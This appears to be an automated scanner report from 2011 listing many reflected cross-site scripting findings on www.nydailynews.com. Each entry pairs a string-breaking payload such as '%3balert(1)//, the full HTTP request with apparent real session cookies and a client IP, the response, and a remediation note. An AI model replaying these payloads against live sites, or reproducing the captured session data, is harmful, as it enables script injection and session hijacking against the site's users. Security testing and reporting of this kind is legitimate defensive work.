This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gossip/2011ce86e'%3b16f413446c/02/08/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:29 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70083
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef076'%3b8ae040c2ded was submitted in the REST URL parameter 3. This input was echoed as ef076';8ae040c2ded in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gossip/2011/02ef076'%3b8ae040c2ded/08/ HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:25:50 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70082
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6aee'%3bde191b0538a was submitted in the REST URL parameter 4. This input was echoed as d6aee';de191b0538a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gossip/2011/02/08d6aee'%3bde191b0538a/ HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:26:10 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70082
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cccb'%3balert(1)//7bfbd00b88b was submitted in the REST URL parameter 1. This input was echoed as 1cccb';alert(1)//7bfbd00b88b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be970'%3balert(1)//fc28488475a was submitted in the REST URL parameter 2. This input was echoed as be970';alert(1)//fc28488475a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84e8a'%3balert(1)//74b043193d was submitted in the REST URL parameter 3. This input was echoed as 84e8a';alert(1)//74b043193d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c22c4'%3balert(1)//37a4eaf8375 was submitted in the REST URL parameter 4. This input was echoed as c22c4';alert(1)//37a4eaf8375 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59ce9'%3balert(1)//5dc533d97c7 was submitted in the REST URL parameter 5. This input was echoed as 59ce9';alert(1)//5dc533d97c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d914a'%3balert(1)//b55e1b0e6e4 was submitted in the REST URL parameter 1. This input was echoed as d914a';alert(1)//b55e1b0e6e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imgd914a'%3balert(1)//b55e1b0e6e4/static/covers/backpage_cover.jpg?1297185846 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:24:35 GMT
Server: Apache
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70227
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63760'%3balert(1)//9e7c975ff5b was submitted in the REST URL parameter 2. This input was echoed as 63760';alert(1)//9e7c975ff5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img/static63760'%3balert(1)//9e7c975ff5b/covers/backpage_cover.jpg?1297185846 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:24:36 GMT
Server: Apache
Keep-Alive: timeout=3, max=994
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70227
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 601ad'%3balert(1)//5fa434a9ff5 was submitted in the REST URL parameter 3. This input was echoed as 601ad';alert(1)//5fa434a9ff5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img/static/covers601ad'%3balert(1)//5fa434a9ff5/backpage_cover.jpg?1297185846 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:24:36 GMT
Server: Apache
Keep-Alive: timeout=3, max=996
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70227
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a38bf'%3balert(1)//5afd0e5995f was submitted in the REST URL parameter 4. This input was echoed as a38bf';alert(1)//5afd0e5995f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img/static/covers/backpage_cover.jpga38bf'%3balert(1)//5afd0e5995f?1297185846 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:24:40 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70227
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 318a4'%3balert(1)//cb18afc39fc was submitted in the REST URL parameter 1. This input was echoed as 318a4';alert(1)//cb18afc39fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img318a4'%3balert(1)//cb18afc39fc/static/covers/frontpage_cover.jpg?1297185846 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:24:33 GMT
Server: Apache
Keep-Alive: timeout=3, max=995
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70228
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80aa3'%3balert(1)//8c43150b43f was submitted in the REST URL parameter 2. This input was echoed as 80aa3';alert(1)//8c43150b43f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img/static80aa3'%3balert(1)//8c43150b43f/covers/frontpage_cover.jpg?1297185846 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:24:36 GMT
Server: Apache
Keep-Alive: timeout=3, max=988
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70228
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e4b5'%3balert(1)//573159094b was submitted in the REST URL parameter 3. This input was echoed as 9e4b5';alert(1)//573159094b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img/static/covers9e4b5'%3balert(1)//573159094b/frontpage_cover.jpg?1297185846 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:24:41 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70227
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97dfc'%3balert(1)//1819df3ce67 was submitted in the REST URL parameter 4. This input was echoed as 97dfc';alert(1)//1819df3ce67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img/static/covers/frontpage_cover.jpg97dfc'%3balert(1)//1819df3ce67?1297185846 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:24:50 GMT
Server: Apache
Keep-Alive: timeout=3, max=996
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70228
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6ae4'%3balert(1)//a7bed429497 was submitted in the REST URL parameter 1. This input was echoed as e6ae4';alert(1)//a7bed429497 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96d71'%3balert(1)//a98bbdfe424 was submitted in the REST URL parameter 2. This input was echoed as 96d71';alert(1)//a98bbdfe424 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8445b'%3balert(1)//d52d15102e7 was submitted in the REST URL parameter 3. This input was echoed as 8445b';alert(1)//d52d15102e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2520b'%3balert(1)//a0925e886b4 was submitted in the REST URL parameter 4. This input was echoed as 2520b';alert(1)//a0925e886b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cc54'%3balert(1)//351f7f544e7 was submitted in the REST URL parameter 1. This input was echoed as 1cc54';alert(1)//351f7f544e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0835'%3balert(1)//899b818019e was submitted in the REST URL parameter 2. This input was echoed as b0835';alert(1)//899b818019e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d601e'%3balert(1)//ad5e9032c9e was submitted in the REST URL parameter 3. This input was echoed as d601e';alert(1)//ad5e9032c9e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff5d6'%3balert(1)//99a0e5c1246 was submitted in the REST URL parameter 4. This input was echoed as ff5d6';alert(1)//99a0e5c1246 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abc66'%3balert(1)//14705d4d725 was submitted in the REST URL parameter 1. This input was echoed as abc66';alert(1)//14705d4d725 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
